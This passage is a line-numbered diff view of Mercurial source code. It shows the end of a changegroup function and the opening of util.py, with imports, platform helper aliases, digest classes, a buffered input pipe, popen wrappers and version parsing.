995 for n in needs:
988 for n in needs:
996 try:
989 try:
997 fl.rev(n)
990 fl.rev(n)
998 except error.LookupError:
991 except error.LookupError:
999 raise error.Abort(
992 raise error.Abort(
1000 _('missing file data for %s:%s - run hg verify') %
993 _('missing file data for %s:%s - run hg verify') %
1001 (f, hex(n)))
994 (f, hex(n)))
1002
995
1003 return revisions, files
996 return revisions, files
@@ -1,3867 +1,3876 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 node as nodemod,
52 node as nodemod,
53 policy,
53 policy,
54 pycompat,
54 pycompat,
55 urllibcompat,
55 urllibcompat,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 spawndetached = platform.spawndetached
150 spawndetached = platform.spawndetached
151 split = platform.split
151 split = platform.split
152 sshargs = platform.sshargs
152 sshargs = platform.sshargs
153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statisexec = platform.statisexec
154 statisexec = platform.statisexec
155 statislink = platform.statislink
155 statislink = platform.statislink
156 testpid = platform.testpid
156 testpid = platform.testpid
157 umask = platform.umask
157 umask = platform.umask
158 unlink = platform.unlink
158 unlink = platform.unlink
159 username = platform.username
159 username = platform.username
160
160
161 try:
161 try:
162 recvfds = osutil.recvfds
162 recvfds = osutil.recvfds
163 except AttributeError:
163 except AttributeError:
164 pass
164 pass
165 try:
165 try:
166 setprocname = osutil.setprocname
166 setprocname = osutil.setprocname
167 except AttributeError:
167 except AttributeError:
168 pass
168 pass
169 try:
169 try:
170 unblocksignal = osutil.unblocksignal
170 unblocksignal = osutil.unblocksignal
171 except AttributeError:
171 except AttributeError:
172 pass
172 pass
173
173
174 # Python compatibility
174 # Python compatibility
175
175
176 _notset = object()
176 _notset = object()
177
177
178 # disable Python's problematic floating point timestamps (issue4836)
178 # disable Python's problematic floating point timestamps (issue4836)
179 # (Python hypocritically says you shouldn't change this behavior in
179 # (Python hypocritically says you shouldn't change this behavior in
180 # libraries, and sure enough Mercurial is not a library.)
180 # libraries, and sure enough Mercurial is not a library.)
181 os.stat_float_times(False)
181 os.stat_float_times(False)
182
182
183 def safehasattr(thing, attr):
183 def safehasattr(thing, attr):
184 return getattr(thing, attr, _notset) is not _notset
184 return getattr(thing, attr, _notset) is not _notset
185
185
186 def bytesinput(fin, fout, *args, **kwargs):
186 def bytesinput(fin, fout, *args, **kwargs):
187 sin, sout = sys.stdin, sys.stdout
187 sin, sout = sys.stdin, sys.stdout
188 try:
188 try:
189 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
189 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
190 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
190 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
191 finally:
191 finally:
192 sys.stdin, sys.stdout = sin, sout
192 sys.stdin, sys.stdout = sin, sout
193
193
194 def bitsfrom(container):
194 def bitsfrom(container):
195 bits = 0
195 bits = 0
196 for bit in container:
196 for bit in container:
197 bits |= bit
197 bits |= bit
198 return bits
198 return bits
199
199
200 # python 2.6 still have deprecation warning enabled by default. We do not want
200 # python 2.6 still have deprecation warning enabled by default. We do not want
201 # to display anything to standard user so detect if we are running test and
201 # to display anything to standard user so detect if we are running test and
202 # only use python deprecation warning in this case.
202 # only use python deprecation warning in this case.
203 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
203 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
204 if _dowarn:
204 if _dowarn:
205 # explicitly unfilter our warning for python 2.7
205 # explicitly unfilter our warning for python 2.7
206 #
206 #
207 # The option of setting PYTHONWARNINGS in the test runner was investigated.
207 # The option of setting PYTHONWARNINGS in the test runner was investigated.
208 # However, module name set through PYTHONWARNINGS was exactly matched, so
208 # However, module name set through PYTHONWARNINGS was exactly matched, so
209 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
209 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
210 # makes the whole PYTHONWARNINGS thing useless for our usecase.
210 # makes the whole PYTHONWARNINGS thing useless for our usecase.
211 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
211 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
212 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
212 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
213 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
213 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
214
214
215 def nouideprecwarn(msg, version, stacklevel=1):
215 def nouideprecwarn(msg, version, stacklevel=1):
216 """Issue an python native deprecation warning
216 """Issue an python native deprecation warning
217
217
218 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
218 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
219 """
219 """
220 if _dowarn:
220 if _dowarn:
221 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
221 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
222 " update your code.)") % version
222 " update your code.)") % version
223 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
223 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
224
224
225 DIGESTS = {
225 DIGESTS = {
226 'md5': hashlib.md5,
226 'md5': hashlib.md5,
227 'sha1': hashlib.sha1,
227 'sha1': hashlib.sha1,
228 'sha512': hashlib.sha512,
228 'sha512': hashlib.sha512,
229 }
229 }
230 # List of digest types from strongest to weakest
230 # List of digest types from strongest to weakest
231 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
231 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
232
232
233 for k in DIGESTS_BY_STRENGTH:
233 for k in DIGESTS_BY_STRENGTH:
234 assert k in DIGESTS
234 assert k in DIGESTS
235
235
236 class digester(object):
236 class digester(object):
237 """helper to compute digests.
237 """helper to compute digests.
238
238
239 This helper can be used to compute one or more digests given their name.
239 This helper can be used to compute one or more digests given their name.
240
240
241 >>> d = digester([b'md5', b'sha1'])
241 >>> d = digester([b'md5', b'sha1'])
242 >>> d.update(b'foo')
242 >>> d.update(b'foo')
243 >>> [k for k in sorted(d)]
243 >>> [k for k in sorted(d)]
244 ['md5', 'sha1']
244 ['md5', 'sha1']
245 >>> d[b'md5']
245 >>> d[b'md5']
246 'acbd18db4cc2f85cedef654fccc4a4d8'
246 'acbd18db4cc2f85cedef654fccc4a4d8'
247 >>> d[b'sha1']
247 >>> d[b'sha1']
248 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
249 >>> digester.preferred([b'md5', b'sha1'])
249 >>> digester.preferred([b'md5', b'sha1'])
250 'sha1'
250 'sha1'
251 """
251 """
252
252
253 def __init__(self, digests, s=''):
253 def __init__(self, digests, s=''):
254 self._hashes = {}
254 self._hashes = {}
255 for k in digests:
255 for k in digests:
256 if k not in DIGESTS:
256 if k not in DIGESTS:
257 raise Abort(_('unknown digest type: %s') % k)
257 raise Abort(_('unknown digest type: %s') % k)
258 self._hashes[k] = DIGESTS[k]()
258 self._hashes[k] = DIGESTS[k]()
259 if s:
259 if s:
260 self.update(s)
260 self.update(s)
261
261
262 def update(self, data):
262 def update(self, data):
263 for h in self._hashes.values():
263 for h in self._hashes.values():
264 h.update(data)
264 h.update(data)
265
265
266 def __getitem__(self, key):
266 def __getitem__(self, key):
267 if key not in DIGESTS:
267 if key not in DIGESTS:
268 raise Abort(_('unknown digest type: %s') % k)
268 raise Abort(_('unknown digest type: %s') % k)
269 return nodemod.hex(self._hashes[key].digest())
269 return nodemod.hex(self._hashes[key].digest())
270
270
271 def __iter__(self):
271 def __iter__(self):
272 return iter(self._hashes)
272 return iter(self._hashes)
273
273
274 @staticmethod
274 @staticmethod
275 def preferred(supported):
275 def preferred(supported):
276 """returns the strongest digest type in both supported and DIGESTS."""
276 """returns the strongest digest type in both supported and DIGESTS."""
277
277
278 for k in DIGESTS_BY_STRENGTH:
278 for k in DIGESTS_BY_STRENGTH:
279 if k in supported:
279 if k in supported:
280 return k
280 return k
281 return None
281 return None
282
282
283 class digestchecker(object):
283 class digestchecker(object):
284 """file handle wrapper that additionally checks content against a given
284 """file handle wrapper that additionally checks content against a given
285 size and digests.
285 size and digests.
286
286
287 d = digestchecker(fh, size, {'md5': '...'})
287 d = digestchecker(fh, size, {'md5': '...'})
288
288
289 When multiple digests are given, all of them are validated.
289 When multiple digests are given, all of them are validated.
290 """
290 """
291
291
292 def __init__(self, fh, size, digests):
292 def __init__(self, fh, size, digests):
293 self._fh = fh
293 self._fh = fh
294 self._size = size
294 self._size = size
295 self._got = 0
295 self._got = 0
296 self._digests = dict(digests)
296 self._digests = dict(digests)
297 self._digester = digester(self._digests.keys())
297 self._digester = digester(self._digests.keys())
298
298
299 def read(self, length=-1):
299 def read(self, length=-1):
300 content = self._fh.read(length)
300 content = self._fh.read(length)
301 self._digester.update(content)
301 self._digester.update(content)
302 self._got += len(content)
302 self._got += len(content)
303 return content
303 return content
304
304
305 def validate(self):
305 def validate(self):
306 if self._size != self._got:
306 if self._size != self._got:
307 raise Abort(_('size mismatch: expected %d, got %d') %
307 raise Abort(_('size mismatch: expected %d, got %d') %
308 (self._size, self._got))
308 (self._size, self._got))
309 for k, v in self._digests.items():
309 for k, v in self._digests.items():
310 if v != self._digester[k]:
310 if v != self._digester[k]:
311 # i18n: first parameter is a digest name
311 # i18n: first parameter is a digest name
312 raise Abort(_('%s mismatch: expected %s, got %s') %
312 raise Abort(_('%s mismatch: expected %s, got %s') %
313 (k, v, self._digester[k]))
313 (k, v, self._digester[k]))
314
314
315 try:
315 try:
316 buffer = buffer
316 buffer = buffer
317 except NameError:
317 except NameError:
318 def buffer(sliceable, offset=0, length=None):
318 def buffer(sliceable, offset=0, length=None):
319 if length is not None:
319 if length is not None:
320 return memoryview(sliceable)[offset:offset + length]
320 return memoryview(sliceable)[offset:offset + length]
321 return memoryview(sliceable)[offset:]
321 return memoryview(sliceable)[offset:]
322
322
323 closefds = pycompat.isposix
323 closefds = pycompat.isposix
324
324
325 _chunksize = 4096
325 _chunksize = 4096
326
326
327 class bufferedinputpipe(object):
327 class bufferedinputpipe(object):
328 """a manually buffered input pipe
328 """a manually buffered input pipe
329
329
330 Python will not let us use buffered IO and lazy reading with 'polling' at
330 Python will not let us use buffered IO and lazy reading with 'polling' at
331 the same time. We cannot probe the buffer state and select will not detect
331 the same time. We cannot probe the buffer state and select will not detect
332 that data are ready to read if they are already buffered.
332 that data are ready to read if they are already buffered.
333
333
334 This class let us work around that by implementing its own buffering
334 This class let us work around that by implementing its own buffering
335 (allowing efficient readline) while offering a way to know if the buffer is
335 (allowing efficient readline) while offering a way to know if the buffer is
336 empty from the output (allowing collaboration of the buffer with polling).
336 empty from the output (allowing collaboration of the buffer with polling).
337
337
338 This class lives in the 'util' module because it makes use of the 'os'
338 This class lives in the 'util' module because it makes use of the 'os'
339 module from the python stdlib.
339 module from the python stdlib.
340 """
340 """
341
341
342 def __init__(self, input):
342 def __init__(self, input):
343 self._input = input
343 self._input = input
344 self._buffer = []
344 self._buffer = []
345 self._eof = False
345 self._eof = False
346 self._lenbuf = 0
346 self._lenbuf = 0
347
347
348 @property
348 @property
349 def hasbuffer(self):
349 def hasbuffer(self):
350 """True is any data is currently buffered
350 """True is any data is currently buffered
351
351
352 This will be used externally a pre-step for polling IO. If there is
352 This will be used externally a pre-step for polling IO. If there is
353 already data then no polling should be set in place."""
353 already data then no polling should be set in place."""
354 return bool(self._buffer)
354 return bool(self._buffer)
355
355
356 @property
356 @property
357 def closed(self):
357 def closed(self):
358 return self._input.closed
358 return self._input.closed
359
359
360 def fileno(self):
360 def fileno(self):
361 return self._input.fileno()
361 return self._input.fileno()
362
362
363 def close(self):
363 def close(self):
364 return self._input.close()
364 return self._input.close()
365
365
366 def read(self, size):
366 def read(self, size):
367 while (not self._eof) and (self._lenbuf < size):
367 while (not self._eof) and (self._lenbuf < size):
368 self._fillbuffer()
368 self._fillbuffer()
369 return self._frombuffer(size)
369 return self._frombuffer(size)
370
370
371 def readline(self, *args, **kwargs):
371 def readline(self, *args, **kwargs):
372 if 1 < len(self._buffer):
372 if 1 < len(self._buffer):
373 # this should not happen because both read and readline end with a
373 # this should not happen because both read and readline end with a
374 # _frombuffer call that collapse it.
374 # _frombuffer call that collapse it.
375 self._buffer = [''.join(self._buffer)]
375 self._buffer = [''.join(self._buffer)]
376 self._lenbuf = len(self._buffer[0])
376 self._lenbuf = len(self._buffer[0])
377 lfi = -1
377 lfi = -1
378 if self._buffer:
378 if self._buffer:
379 lfi = self._buffer[-1].find('\n')
379 lfi = self._buffer[-1].find('\n')
380 while (not self._eof) and lfi < 0:
380 while (not self._eof) and lfi < 0:
381 self._fillbuffer()
381 self._fillbuffer()
382 if self._buffer:
382 if self._buffer:
383 lfi = self._buffer[-1].find('\n')
383 lfi = self._buffer[-1].find('\n')
384 size = lfi + 1
384 size = lfi + 1
385 if lfi < 0: # end of file
385 if lfi < 0: # end of file
386 size = self._lenbuf
386 size = self._lenbuf
387 elif 1 < len(self._buffer):
387 elif 1 < len(self._buffer):
388 # we need to take previous chunks into account
388 # we need to take previous chunks into account
389 size += self._lenbuf - len(self._buffer[-1])
389 size += self._lenbuf - len(self._buffer[-1])
390 return self._frombuffer(size)
390 return self._frombuffer(size)
391
391
392 def _frombuffer(self, size):
392 def _frombuffer(self, size):
393 """return at most 'size' data from the buffer
393 """return at most 'size' data from the buffer
394
394
395 The data are removed from the buffer."""
395 The data are removed from the buffer."""
396 if size == 0 or not self._buffer:
396 if size == 0 or not self._buffer:
397 return ''
397 return ''
398 buf = self._buffer[0]
398 buf = self._buffer[0]
399 if 1 < len(self._buffer):
399 if 1 < len(self._buffer):
400 buf = ''.join(self._buffer)
400 buf = ''.join(self._buffer)
401
401
402 data = buf[:size]
402 data = buf[:size]
403 buf = buf[len(data):]
403 buf = buf[len(data):]
404 if buf:
404 if buf:
405 self._buffer = [buf]
405 self._buffer = [buf]
406 self._lenbuf = len(buf)
406 self._lenbuf = len(buf)
407 else:
407 else:
408 self._buffer = []
408 self._buffer = []
409 self._lenbuf = 0
409 self._lenbuf = 0
410 return data
410 return data
411
411
412 def _fillbuffer(self):
412 def _fillbuffer(self):
413 """read data to the buffer"""
413 """read data to the buffer"""
414 data = os.read(self._input.fileno(), _chunksize)
414 data = os.read(self._input.fileno(), _chunksize)
415 if not data:
415 if not data:
416 self._eof = True
416 self._eof = True
417 else:
417 else:
418 self._lenbuf += len(data)
418 self._lenbuf += len(data)
419 self._buffer.append(data)
419 self._buffer.append(data)
420
420
421 def mmapread(fp):
421 def mmapread(fp):
422 try:
422 try:
423 fd = getattr(fp, 'fileno', lambda: fp)()
423 fd = getattr(fp, 'fileno', lambda: fp)()
424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 except ValueError:
425 except ValueError:
426 # Empty files cannot be mmapped, but mmapread should still work. Check
426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 # if the file is empty, and if so, return an empty buffer.
427 # if the file is empty, and if so, return an empty buffer.
428 if os.fstat(fd).st_size == 0:
428 if os.fstat(fd).st_size == 0:
429 return ''
429 return ''
430 raise
430 raise
431
431
432 def popen2(cmd, env=None, newlines=False):
432 def popen2(cmd, env=None, newlines=False):
433 # Setting bufsize to -1 lets the system decide the buffer size.
433 # Setting bufsize to -1 lets the system decide the buffer size.
434 # The default for bufsize is 0, meaning unbuffered. This leads to
434 # The default for bufsize is 0, meaning unbuffered. This leads to
435 # poor performance on Mac OS X: http://bugs.python.org/issue4194
435 # poor performance on Mac OS X: http://bugs.python.org/issue4194
436 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
436 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
437 close_fds=closefds,
437 close_fds=closefds,
438 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
438 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
439 universal_newlines=newlines,
439 universal_newlines=newlines,
440 env=env)
440 env=env)
441 return p.stdin, p.stdout
441 return p.stdin, p.stdout
442
442
443 def popen3(cmd, env=None, newlines=False):
443 def popen3(cmd, env=None, newlines=False):
444 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
444 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
445 return stdin, stdout, stderr
445 return stdin, stdout, stderr
446
446
447 def popen4(cmd, env=None, newlines=False, bufsize=-1):
447 def popen4(cmd, env=None, newlines=False, bufsize=-1):
448 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
448 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
449 close_fds=closefds,
449 close_fds=closefds,
450 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
450 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
451 stderr=subprocess.PIPE,
451 stderr=subprocess.PIPE,
452 universal_newlines=newlines,
452 universal_newlines=newlines,
453 env=env)
453 env=env)
454 return p.stdin, p.stdout, p.stderr, p
454 return p.stdin, p.stdout, p.stderr, p
455
455
456 def version():
456 def version():
457 """Return version information if available."""
457 """Return version information if available."""
458 try:
458 try:
459 from . import __version__
459 from . import __version__
460 return __version__.version
460 return __version__.version
461 except ImportError:
461 except ImportError:
462 return 'unknown'
462 return 'unknown'
463
463
464 def versiontuple(v=None, n=4):
464 def versiontuple(v=None, n=4):
465 """Parses a Mercurial version string into an N-tuple.
465 """Parses a Mercurial version string into an N-tuple.
466
466
467 The version string to be parsed is specified with the ``v`` argument.
467 The version string to be parsed is specified with the ``v`` argument.
468 If it isn't defined, the current Mercurial version string will be parsed.
468 If it isn't defined, the current Mercurial version string will be parsed.
469
469
470 ``n`` can be 2, 3, or 4. Here is how some version strings map to
470 ``n`` can be 2, 3, or 4. Here is how some version strings map to
471 returned values:
471 returned values:
472
472
473 >>> v = b'3.6.1+190-df9b73d2d444'
473 >>> v = b'3.6.1+190-df9b73d2d444'
474 >>> versiontuple(v, 2)
474 >>> versiontuple(v, 2)
475 (3, 6)
475 (3, 6)
476 >>> versiontuple(v, 3)
476 >>> versiontuple(v, 3)
477 (3, 6, 1)
477 (3, 6, 1)
478 >>> versiontuple(v, 4)
478 >>> versiontuple(v, 4)
479 (3, 6, 1, '190-df9b73d2d444')
479 (3, 6, 1, '190-df9b73d2d444')
480
480
481 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
481 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
482 (3, 6, 1, '190-df9b73d2d444+20151118')
482 (3, 6, 1, '190-df9b73d2d444+20151118')
483
483
484 >>> v = b'3.6'
484 >>> v = b'3.6'
485 >>> versiontuple(v, 2)
485 >>> versiontuple(v, 2)
486 (3, 6)
486 (3, 6)
487 >>> versiontuple(v, 3)
487 >>> versiontuple(v, 3)
488 (3, 6, None)
488 (3, 6, None)
489 >>> versiontuple(v, 4)
489 >>> versiontuple(v, 4)
490 (3, 6, None, None)
490 (3, 6, None, None)
491
491
492 >>> v = b'3.9-rc'
492 >>> v = b'3.9-rc'
493 >>> versiontuple(v, 2)
493 >>> versiontuple(v, 2)
494 (3, 9)
494 (3, 9)
495 >>> versiontuple(v, 3)
495 >>> versiontuple(v, 3)
496 (3, 9, None)
496 (3, 9, None)
497 >>> versiontuple(v, 4)
497 >>> versiontuple(v, 4)
498 (3, 9, None, 'rc')
498 (3, 9, None, 'rc')
499
499
500 >>> v = b'3.9-rc+2-02a8fea4289b'
500 >>> v = b'3.9-rc+2-02a8fea4289b'
501 >>> versiontuple(v, 2)
501 >>> versiontuple(v, 2)
502 (3, 9)
502 (3, 9)
503 >>> versiontuple(v, 3)
503 >>> versiontuple(v, 3)
504 (3, 9, None)
504 (3, 9, None)
505 >>> versiontuple(v, 4)
505 >>> versiontuple(v, 4)
506 (3, 9, None, 'rc+2-02a8fea4289b')
506 (3, 9, None, 'rc+2-02a8fea4289b')
507 """
507 """
508 if not v:
508 if not v:
509 v = version()
509 v = version()
510 parts = remod.split('[\+-]', v, 1)
510 parts = remod.split('[\+-]', v, 1)
511 if len(parts) == 1:
511 if len(parts) == 1:
512 vparts, extra = parts[0], None
512 vparts, extra = parts[0], None
513 else:
513 else:
514 vparts, extra = parts
514 vparts, extra = parts
515
515
516 vints = []
516 vints = []
517 for i in vparts.split('.'):
517 for i in vparts.split('.'):
518 try:
518 try:
519 vints.append(int(i))
519 vints.append(int(i))
520 except ValueError:
520 except ValueError:
521 break
521 break
522 # (3, 6) -> (3, 6, None)
522 # (3, 6) -> (3, 6, None)
523 while len(vints) < 3:
523 while len(vints) < 3:
524 vints.append(None)
524 vints.append(None)
525
525
526 if n == 2:
526 if n == 2:
527 return (vints[0], vints[1])
527 return (vints[0], vints[1])
528 if n == 3:
528 if n == 3:
529 return (vints[0], vints[1], vints[2])
529 return (vints[0], vints[1], vints[2])
530 if n == 4:
530 if n == 4:
531 return (vints[0], vints[1], vints[2], extra)
531 return (vints[0], vints[1], vints[2], extra)
532
532
533 # used by parsedate
533 # used by parsedate
534 defaultdateformats = (
534 defaultdateformats = (
535 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
535 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
536 '%Y-%m-%dT%H:%M', # without seconds
536 '%Y-%m-%dT%H:%M', # without seconds
537 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
537 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
538 '%Y-%m-%dT%H%M', # without seconds
538 '%Y-%m-%dT%H%M', # without seconds
539 '%Y-%m-%d %H:%M:%S', # our common legal variant
539 '%Y-%m-%d %H:%M:%S', # our common legal variant
540 '%Y-%m-%d %H:%M', # without seconds
540 '%Y-%m-%d %H:%M', # without seconds
541 '%Y-%m-%d %H%M%S', # without :
541 '%Y-%m-%d %H%M%S', # without :
542 '%Y-%m-%d %H%M', # without seconds
542 '%Y-%m-%d %H%M', # without seconds
543 '%Y-%m-%d %I:%M:%S%p',
543 '%Y-%m-%d %I:%M:%S%p',
544 '%Y-%m-%d %H:%M',
544 '%Y-%m-%d %H:%M',
545 '%Y-%m-%d %I:%M%p',
545 '%Y-%m-%d %I:%M%p',
546 '%Y-%m-%d',
546 '%Y-%m-%d',
547 '%m-%d',
547 '%m-%d',
548 '%m/%d',
548 '%m/%d',
549 '%m/%d/%y',
549 '%m/%d/%y',
550 '%m/%d/%Y',
550 '%m/%d/%Y',
551 '%a %b %d %H:%M:%S %Y',
551 '%a %b %d %H:%M:%S %Y',
552 '%a %b %d %I:%M:%S%p %Y',
